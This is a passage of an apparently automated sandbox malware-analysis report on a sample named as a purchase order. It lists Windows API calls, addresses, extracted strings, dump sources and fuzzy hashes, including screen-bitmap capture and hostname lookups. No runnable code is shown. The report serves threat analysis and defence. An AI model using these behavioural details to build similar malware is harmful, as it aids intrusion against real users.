                                                    • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                    • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                    • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                    • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                    • __swprintf.LIBCMT ref: 00460915
                                                    • __swprintf.LIBCMT ref: 0046092D
                                                    • _wprintf.LIBCMT ref: 004609E1
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                    • API String ID: 3631882475-2268648507
                                                    • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                    • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                    • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                    • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                    APIs
                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                    • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                    • SendMessageW.USER32 ref: 00471740
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                    • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                    • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                    • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                    • SendMessageW.USER32 ref: 0047184F
                                                    • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                    • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                    • String ID:
                                                    • API String ID: 4116747274-0
                                                    • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                    • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                    • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                    • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                    • _wcslen.LIBCMT ref: 00461683
                                                    • __swprintf.LIBCMT ref: 00461721
                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                    • GetDlgCtrlID.USER32(?), ref: 00461869
                                                    • GetWindowRect.USER32(?,?), ref: 004618A4
                                                    • GetParent.USER32(?), ref: 004618C3
                                                    • ScreenToClient.USER32(00000000), ref: 004618CA
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                    • String ID: %s%u
                                                    • API String ID: 1899580136-679674701
                                                    • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                    • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                    • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                    • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                    • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                    • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu$Sleep
                                                    • String ID: 0
                                                    • API String ID: 1196289194-4108050209
                                                    • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                    • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                    • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                    • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0043143E
                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                    • SelectObject.GDI32(00000000,?), ref: 00431466
                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                    • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                    • String ID: (
                                                    • API String ID: 3300687185-3887548279
                                                    • Opcode ID: 8b9fc93d41908474716197757958ef270abb238abb340e32d56b7e74e1666973
                                                    • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                    • Opcode Fuzzy Hash: 8b9fc93d41908474716197757958ef270abb238abb340e32d56b7e74e1666973
                                                    • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                    APIs
                                                      • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                      • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                    • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 1976180769-4113822522
                                                    • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                    • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                    • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                    • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                    • String ID:
                                                    • API String ID: 461458858-0
                                                    • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                    • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                    • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                    • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                    • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                    • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                    • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                    • DeleteObject.GDI32(?), ref: 004301D0
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID:
                                                    • API String ID: 3969911579-0
                                                    • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                    • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                    • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                    • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                    • String ID: 0
                                                    • API String ID: 956284711-4108050209
                                                    • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                    • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                    • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                    • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 1965227024-3771769585
                                                    • Opcode ID: 03f87254d8d51c9da7a526667564e0f25ce075e20d9ffafd092500c411c1bb4f
                                                    • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                    • Opcode Fuzzy Hash: 03f87254d8d51c9da7a526667564e0f25ce075e20d9ffafd092500c411c1bb4f
                                                    • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                    APIs
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: SendString$_memmove_wcslen
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 369157077-1007645807
                                                    • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                    • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                    • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                    • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                    APIs
                                                    • GetParent.USER32 ref: 00445BF8
                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                    • __wcsicoll.LIBCMT ref: 00445C33
                                                    • __wcsicoll.LIBCMT ref: 00445C4F
                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll$ClassMessageNameParentSend
                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                    • API String ID: 3125838495-3381328864
                                                    • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                    • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                    • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                    • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                    APIs
                                                    • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                    • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                    • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                    • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                    • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CharNext
                                                    • String ID:
                                                    • API String ID: 1350042424-0
